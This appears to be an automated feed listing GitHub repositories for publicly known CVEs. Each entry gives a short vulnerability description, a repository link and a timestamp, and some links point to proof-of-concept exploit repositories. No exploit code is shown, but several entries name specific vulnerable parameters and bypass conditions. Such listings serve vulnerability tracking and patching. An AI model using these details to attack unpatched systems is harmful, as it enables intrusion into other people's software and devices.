**XMFile::read in XMFile.cpp in milkyplay in MilkyTracker 1.02.00 has a heap-based buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14464](https://github.com/Live-Hack-CVE/CVE-2019-14464) create time: 2023-01-20T17:55:42Z

**In in wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php in WordPress 3.7 to 5.3.0, authenticated users who do not have the rights to publish a post are able to mark posts as sticky or unsticky via the REST API. For example, the contributor role does not have such rights, but this allowed them to bypass CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20043](https://github.com/Live-Hack-CVE/CVE-2019-20043) create time: 2023-01-20T17:55:22Z

**An issue was discovered in Open Ticket Request System (OTRS) 5.x through 5.0.34, 6.x through 6.0.17, and 7.x through 7.0.6. An attacker who is logged into OTRS as an agent user with appropriate permissions may try to import carefully crafted Report Statistics XML that will result in reading of arbitrary files on the OT CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9892](https://github.com/Live-Hack-CVE/CVE-2019-9892) create time: 2023-01-20T17:55:19Z

**An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.8, Community Edition 6.0.x through 6.0.19, and Community Edition 5.0.x through 5.0.36. In the customer or external frontend, personal information of agents (e.g., Name and mail address) can be disclosed in external notes. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-12497](https://github.com/Live-Hack-CVE/CVE-2019-12497) create time: 2023-01-20T17:55:15Z

**An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.7, Community Edition 6.0.x through 6.0.19, and Community Edition 5.0.x through 5.0.36. An attacker could send a malicious email to an OTRS system. If a logged-in agent user quotes it, the email could cause the browser to load external image CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-12248](https://github.com/Live-Hack-CVE/CVE-2019-12248) create time: 2023-01-20T17:55:10Z

**LoaderXM::load in LoaderXM.cpp in milkyplay in MilkyTracker 1.02.00 has a stack-based buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14496](https://github.com/Live-Hack-CVE/CVE-2019-14496) create time: 2023-01-20T17:55:07Z

**An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19781](https://github.com/Live-Hack-CVE/CVE-2019-19781) create time: 2023-01-20T17:55:02Z

**A floating-point exception was discovered in PackLinuxElf::elf_hash in p_lx_elf.cpp in UPX 3.95. The vulnerability causes an application crash, which leads to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20051](https://github.com/Live-Hack-CVE/CVE-2019-20051) create time: 2023-01-20T17:54:58Z

**ModuleEditor::convertInstrument in tracker/ModuleEditor.cpp in MilkyTracker 1.02.00 has a heap-based buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14497](https://github.com/Live-Hack-CVE/CVE-2019-14497) create time: 2023-01-20T17:54:54Z

**An issue was discovered in Open Ticket Request System (OTRS) Community Edition 5.0.x through 5.0.36 and 6.0.x through 6.0.19. A user logged into OTRS as an agent might unknowingly disclose their session ID by sharing the link of an embedded ticket article with third parties. This identifier can be then be potentially a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-12746](https://github.com/Live-Hack-CVE/CVE-2019-12746) create time: 2023-01-20T17:54:50Z

**An issue was discovered in Open Ticket Request System (OTRS) 7.0.x through 7.0.8, and Community Edition 5.0.x through 5.0.36 and 6.0.x through 6.0.19. An attacker who is logged into OTRS as an agent user with appropriate permissions can leverage OTRS notification tags in templates in order to disclose hashed user passw CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13458](https://github.com/Live-Hack-CVE/CVE-2019-13458) create time: 2023-01-20T17:54:46Z

**A class generated by the Generator in JHipster before 6.3.0 and JHipster Kotlin through 1.1.0 produces code that uses an insecure source of randomness (apache.commons.lang3 RandomStringUtils). This allows an attacker (if able to obtain their own password reset URL) to compute the value for all other password resets for CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16303](https://github.com/Live-Hack-CVE/CVE-2019-16303) create time: 2023-01-20T17:54:41Z

**Smanos W100 1.0.0 devices have Insecure Permissions, exploitable by an attacker on the same Wi-Fi network. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13361](https://github.com/Live-Hack-CVE/CVE-2019-13361) create time: 2023-01-20T17:54:37Z

**MantisBT before 1.3.20 and 2.22.1 allows Post Authentication Command Injection, leading to Remote Code Execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15715](https://github.com/Live-Hack-CVE/CVE-2019-15715) create time: 2023-01-20T17:54:33Z

**In the Loofah gem for Ruby through v2.3.0 unsanitized JavaScript may occur in sanitized output when a crafted SVG element is republished. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15587](https://github.com/Live-Hack-CVE/CVE-2019-15587) create time: 2023-01-20T17:54:28Z

**we got reports for 2 injection attacks against the DeltaSpike windowhandler.js. This is only active if a developer selected the ClientSideWindowStrategy which is not the default. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-12416](https://github.com/Live-Hack-CVE/CVE-2019-12416) create time: 2023-01-20T17:54:20Z

**Codoforum 4.8.3 allows XSS via a post using parameters display name, title name, or content. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5306](https://github.com/Live-Hack-CVE/CVE-2020-5306) create time: 2023-01-20T17:54:24Z

**Proof-of-concept for the CVE-2022-42864 IOHIDFamily race condition** : [Muirey03/CVE-2022-42864](https://github.com/Muirey03/CVE-2022-42864) create time: 2023-01-19T20:36:49Z

**Remote Code Execution in Social Warfare Plugin before 3.5.3 for Wordpress.** : [grimlockx/CVE-2019-9978](https://github.com/grimlockx/CVE-2019-9978) create time: 2023-01-20T16:29:18Z

**The netlink_sendmsg function in net/netlink/af_netlink.c in the Linux kernel before 3.5.5 does not validate the dst_pid field, which allows local users to have an unspecified impact by spoofing Netlink messages. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-6689](https://github.com/Live-Hack-CVE/CVE-2012-6689) create time: 2023-01-20T15:42:41Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16332](https://github.com/Live-Hack-CVE/CVE-2017-16332) create time: 2023-01-20T15:42:59Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16334](https://github.com/Live-Hack-CVE/CVE-2017-16334) create time: 2023-01-20T15:42:51Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16335](https://github.com/Live-Hack-CVE/CVE-2017-16335) create time: 2023-01-20T15:42:34Z

**MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7615](https://github.com/Live-Hack-CVE/CVE-2017-7615) create time: 2023-01-20T15:42:23Z

**A memory leak in the dwc3_pci_probe() function in drivers/usb/dwc3/dwc3-pci.c in the Linux kernel through 5.3.9 allows attackers to cause a denial of service (memory consumption) by triggering platform_device_add_properties() failures, aka CID-9bbfceea12a8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18813](https://github.com/Live-Hack-CVE/CVE-2019-18813) create time: 2023-01-20T15:42:38Z

**Remote Code Execution in Social Warfare Plugin before 3.5.3 for Wordpress.** : [grimlockx/CVE-2019-9978](https://github.com/grimlockx/CVE-2019-9978) create time: 2022-12-09T01:10:31Z

**A vulnerability in the web-based management interface of Cisco Identity Services Engine could allow an authenticated, remote attacker to conduct cross-site scripting attacks against other users of the application web-based management interface. This vulnerability is due to improper validation of input to an application CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20967](https://github.com/Live-Hack-CVE/CVE-2022-20967) create time: 2023-01-20T15:43:08Z

**Memory leak in icmp6 implementation in Linux Kernel 5.13+ allows a remote attacker to DoS a host by making it go out-of-memory via icmp6 packets of type 130 or 131. We recommend upgrading past commit 2d3916f3189172d5c69d33065c3c21119fe539fc. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0742](https://github.com/Live-Hack-CVE/CVE-2022-0742) create time: 2023-01-20T15:42:46Z

**Directory traversal vulnerability in Reprise License Manager (RLM) web interface before 14.2BL4 in the diagnostics function that allows RLM users with sufficient privileges to overwrite any file the on the server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37500](https://github.com/Live-Hack-CVE/CVE-2021-37500) create time: 2023-01-20T13:31:06Z

**CRLF vulnerability in Reprise License Manager (RLM) web interface through 14.2BL4 in the password parameter in View License Result function, that allows remote attackers to inject arbitrary HTTP headers. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37499](https://github.com/Live-Hack-CVE/CVE-2021-37499) create time: 2023-01-20T13:31:02Z

**An SSRF issue was discovered in Reprise License Manager (RLM) web interface through 14.2BL4 that allows remote attackers to trigger outbound requests to intranet servers, conduct port scans via the actserver parameter in License Activation function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37498](https://github.com/Live-Hack-CVE/CVE-2021-37498) create time: 2023-01-20T13:30:58Z

**Information System's Security 2nd Assignment** : [WellingtonEspindula/SSI-CVE-2022-21661](https://github.com/WellingtonEspindula/SSI-CVE-2022-21661) create time: 2023-01-13T13:31:34Z

**The webserver in Delta DX-3021 versions prior to 1.24 is vulnerable to command injection through the network diagnosis page. This vulnerability could allow a remote unauthenticated user to add files, delete files, and change file permissions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4616](https://github.com/Live-Hack-CVE/CVE-2022-4616) create time: 2023-01-20T11:18:46Z

**EXFO - BV-10 Performance Endpoint Unit misconfiguration. System configuration file has misconfigured permissions CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39186](https://github.com/Live-Hack-CVE/CVE-2022-39186) create time: 2023-01-20T11:18:42Z

**A symlink following vulnerability was found in Samba, where a user can create a symbolic link that will make 'smbd' escape the configured share path. This flaw allows a remote user with access to the exported part of the file system under a share via SMB1 unix extensions or NFS to create symlinks to files outside the ' CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3592](https://github.com/Live-Hack-CVE/CVE-2022-3592) create time: 2023-01-20T11:18:35Z

**A heap-based buffer overflow vulnerability was found in Samba within the GSSAPI unwrap_des() and unwrap_des3() routines of Heimdal. The DES and Triple-DES decryption routines in the Heimdal GSSAPI library allow a length-limited write buffer overflow on malloc() allocated memory when presented with a maliciously small p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3437](https://github.com/Live-Hack-CVE/CVE-2022-3437) create time: 2023-01-20T11:18:27Z

**Predictable Seed in Pseudo-Random Number Generator (PRNG) vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series FX5U-xMy/z (x=32,64,80, y=T,R, z=ES,DS,ESS,DSS) with serial number 17X**** or later, and versions 1.280 and prior, Mitsubishi Electric Corporation MELSEC iQ-F Series FX5U-xMy/z (x=32,64,80, y=T, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40267](https://github.com/Live-Hack-CVE/CVE-2022-40267) create time: 2023-01-20T11:18:15Z

**no description** : [rahulpatwari/CVE-2023-23163](https://github.com/rahulpatwari/CVE-2023-23163) create time: 2023-01-20T11:32:19Z

**no description** : [rahulpatwari/CVE-2023-23162](https://github.com/rahulpatwari/CVE-2023-23162) create time: 2023-01-20T11:29:54Z

**no description** : [rahulpatwari/CVE-2023-23161](https://github.com/rahulpatwari/CVE-2023-23161) create time: 2023-01-20T11:28:30Z

**Insufficient Session Expiration in GitHub repository pyload/pyload prior to 0.5.0b3.dev36. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0227](https://github.com/Live-Hack-CVE/CVE-2023-0227) create time: 2023-01-20T11:18:31Z

**Dell EMC PV ME5, versions ME5.1.0.0.0 and ME5.1.0.1.0, contains a Client-side desync Vulnerability. An unauthenticated attacker could potentially exploit this vulnerability to force a victim's browser to desynchronize its connection with the website, typically leading to XSS and DoS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23691](https://github.com/Live-Hack-CVE/CVE-2023-23691) create time: 2023-01-20T11:18:23Z

**jc21 NGINX Proxy Manager through 2.9.19 allows OS command injection. When creating an access list, the backend builds an htpasswd file with crafted username and/or password input that is concatenated without any validation, and is directly passed to the exec command, potentially allowing an authenticated attacker to ex CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23596](https://github.com/Live-Hack-CVE/CVE-2023-23596) create time: 2023-01-20T11:18:19Z

**no description** : [Trinadh465/linux-4.1.15_CVE-2022-45934](https://github.com/Trinadh465/linux-4.1.15_CVE-2022-45934) create time: 2023-01-20T10:03:07Z

**The batadv_frag_merge_packets function in net/batman-adv/fragmentation.c in the B.A.T.M.A.N. implementation in the Linux kernel through 3.18.1 uses an incorrect length field during a calculation of an amount of memory, which allows remote attackers to cause a denial of service (mesh-node system crash) via fragmented pa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-9428](https://github.com/Live-Hack-CVE/CVE-2014-9428) create time: 2023-01-20T06:56:39Z

**The oz_usb_handle_ep_data function in drivers/staging/ozwpan/ozusbsvc1.c in the OZWPAN driver in the Linux kernel through 4.0.5 allows remote attackers to cause a denial of service (divide-by-zero error and system crash) via a crafted packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4003](https://github.com/Live-Hack-CVE/CVE-2015-4003) create time: 2023-01-20T06:56:43Z

**Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4153](https://github.com/Live-Hack-CVE/CVE-2016-4153) create time: 2023-01-20T06:56:34Z

**Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-102 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1033](https://github.com/Live-Hack-CVE/CVE-2016-1033) create time: 2023-01-20T06:56:30Z

**Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4154](https://github.com/Live-Hack-CVE/CVE-2016-4154) create time: 2023-01-20T06:56:27Z

**Tenda M3 V1.0.0.12 was discovered to contain multiple stack overflow vulnerabilities via the ssidList, storeName, and trademark parameters in the function formSetStoreWeb. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32036](https://github.com/Live-Hack-CVE/CVE-2022-32036) create time: 2023-01-20T06:56:48Z

**Cross-site scripting vulnerability in CONPROSYS HMI System (CHS) Ver.3.4.5 and earlier allows a remote authenticated attacker to inject an arbitrary script and obtain the sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22373](https://github.com/Live-Hack-CVE/CVE-2023-22373) create time: 2023-01-20T06:56:22Z

**Improper access control vulnerability in CONPROSYS HMI System (CHS) Ver.3.4.5 and earlier allows a remote unauthenticated attacker to bypass access restriction and obtain the server certificate including the private key of the product. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22339](https://github.com/Live-Hack-CVE/CVE-2023-22339) create time: 2023-01-20T06:56:18Z

**Use of password hash instead of password for authentication vulnerability in CONPROSYS HMI System (CHS) Ver.3.4.5 and earlier allows a remote authenticated attacker to obtain user credentials information via a man-in-the-middle attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22334](https://github.com/Live-Hack-CVE/CVE-2023-22334) create time: 2023-01-20T06:56:14Z

**Use of default credentials vulnerability in CONPROSYS HMI System (CHS) Ver.3.4.5 and earlier allows a remote unauthenticated attacker to alter user credentials information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22331](https://github.com/Live-Hack-CVE/CVE-2023-22331) create time: 2023-01-20T06:56:11Z

**no description** : [Trinadh465/linux-4.19.72_CVE-2022-45934](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-45934) create time: 2023-01-20T05:00:05Z

**no description** : [nidhi7598/linux-3.0.35_CVE-2022-45934](https://github.com/nidhi7598/linux-3.0.35_CVE-2022-45934) create time: 2023-01-20T04:46:42Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16259](https://github.com/Live-Hack-CVE/CVE-2017-16259) create time: 2023-01-20T01:20:13Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16314](https://github.com/Live-Hack-CVE/CVE-2017-16314) create time: 2023-01-20T00:15:31Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16313](https://github.com/Live-Hack-CVE/CVE-2017-16313) create time: 2023-01-20T00:15:28Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16316](https://github.com/Live-Hack-CVE/CVE-2017-16316) create time: 2023-01-20T00:15:24Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16315](https://github.com/Live-Hack-CVE/CVE-2017-16315) create time: 2023-01-20T00:15:20Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16317](https://github.com/Live-Hack-CVE/CVE-2017-16317) create time: 2023-01-20T00:15:16Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16319](https://github.com/Live-Hack-CVE/CVE-2017-16319) create time: 2023-01-20T00:15:12Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16318](https://github.com/Live-Hack-CVE/CVE-2017-16318) create time: 2023-01-20T00:15:09Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16320](https://github.com/Live-Hack-CVE/CVE-2017-16320) create time: 2023-01-20T00:15:05Z

**D-Link DIR-859 A1 1.05 was discovered to contain a command injection vulnerability via the service= variable in the soapcgi_main function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46476](https://github.com/Live-Hack-CVE/CVE-2022-46476) create time: 2023-01-20T01:20:20Z

**Buffer overflow in function Notepad_plus::addHotSpot in Notepad++ v8.4.3 and earlier allows attackers to crash the application via two crafted files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31901](https://github.com/Live-Hack-CVE/CVE-2022-31901) create time: 2023-01-20T01:20:17Z

**PopojiCMS v2.0.1 backend plugin function has a file upload vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47766](https://github.com/Live-Hack-CVE/CVE-2022-47766) create time: 2023-01-20T00:14:48Z

**Weak access control in NexusPHP before 1.7.33 allows a remote authenticated user to edit any post in the forum (this is caused by a lack of checks performed by the /forums.php?action=post page). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46890](https://github.com/Live-Hack-CVE/CVE-2022-46890) create time: 2023-01-20T00:14:44Z

**A persistent cross-site scripting (XSS) vulnerability in NexusPHP before 1.7.33 allows remote authenticated attackers to permanently inject arbitrary web script or HTML via the title parameter used in /subtitles.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46889](https://github.com/Live-Hack-CVE/CVE-2022-46889) create time: 2023-01-20T00:14:40Z

**Multiple reflective cross-site scripting (XSS) vulnerabilities in NexusPHP before 1.7.33 allow remote attackers to inject arbitrary web script or HTML via the secret parameter in /login.php; q parameter in /user-ban-log.php; query parameter in /log.php; text parameter in /moresmiles.php; q parameter in myhr.php; or id CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46888](https://github.com/Live-Hack-CVE/CVE-2022-46888) create time: 2023-01-20T00:14:36Z

**Multiple SQL injection vulnerabilities in NexusPHP before 1.7.33 allow remote attackers to execute arbitrary SQL commands via the conuser[] parameter in takeconfirm.php; the delcheater parameter in cheaterbox.php; or the usernw parameter in nowarn.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46887](https://github.com/Live-Hack-CVE/CVE-2022-46887) create time: 2023-01-20T00:14:32Z

**tpm2-tss is an open source software implementation of the Trusted Computing Group (TCG) Trusted Platform Module (TPM) 2 Software Stack (TSS2). In affected versions `Tss2_RC_SetHandler` and `Tss2_RC_Decode` both index into `layer_handler` with an 8 bit layer number, but the array only has `TPM2_ERROR_TSS2_RC_LAYER_COUNT CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22745](https://github.com/Live-Hack-CVE/CVE-2023-22745) create time: 2023-01-20T01:20:24Z

**Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0126](https://github.com/Live-Hack-CVE/CVE-2023-0126) create time: 2023-01-20T00:14:51Z

**Sofia-SIP is an open-source SIP User-Agent library, compliant with the IETF RFC3261 specification. In affected versions Sofia-SIP **lacks both message length and attributes length checks** when it handles STUN packets, leading to controllable heap-over-flow. For example, in stun_parse_attribute(), after we get the attr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22741](https://github.com/Live-Hack-CVE/CVE-2023-22741) create time: 2023-01-20T00:14:29Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16272](https://github.com/Live-Hack-CVE/CVE-2017-16272) create time: 2023-01-19T22:03:15Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16278](https://github.com/Live-Hack-CVE/CVE-2017-16278) create time: 2023-01-19T22:03:10Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16282](https://github.com/Live-Hack-CVE/CVE-2017-16282) create time: 2023-01-19T22:03:06Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16283](https://github.com/Live-Hack-CVE/CVE-2017-16283) create time: 2023-01-19T22:03:00Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16284](https://github.com/Live-Hack-CVE/CVE-2017-16284) create time: 2023-01-19T22:02:56Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16285](https://github.com/Live-Hack-CVE/CVE-2017-16285) create time: 2023-01-19T22:02:53Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16287](https://github.com/Live-Hack-CVE/CVE-2017-16287) create time: 2023-01-19T22:02:48Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16288](https://github.com/Live-Hack-CVE/CVE-2017-16288) create time: 2023-01-19T22:02:44Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16290](https://github.com/Live-Hack-CVE/CVE-2017-16290) create time: 2023-01-19T22:02:39Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16291](https://github.com/Live-Hack-CVE/CVE-2017-16291) create time: 2023-01-19T22:02:35Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16292](https://github.com/Live-Hack-CVE/CVE-2017-16292) create time: 2023-01-19T22:02:31Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16304](https://github.com/Live-Hack-CVE/CVE-2017-16304) create time: 2023-01-19T22:02:22Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16311](https://github.com/Live-Hack-CVE/CVE-2017-16311) create time: 2023-01-19T22:02:17Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16312](https://github.com/Live-Hack-CVE/CVE-2017-16312) create time: 2023-01-19T22:02:14Z

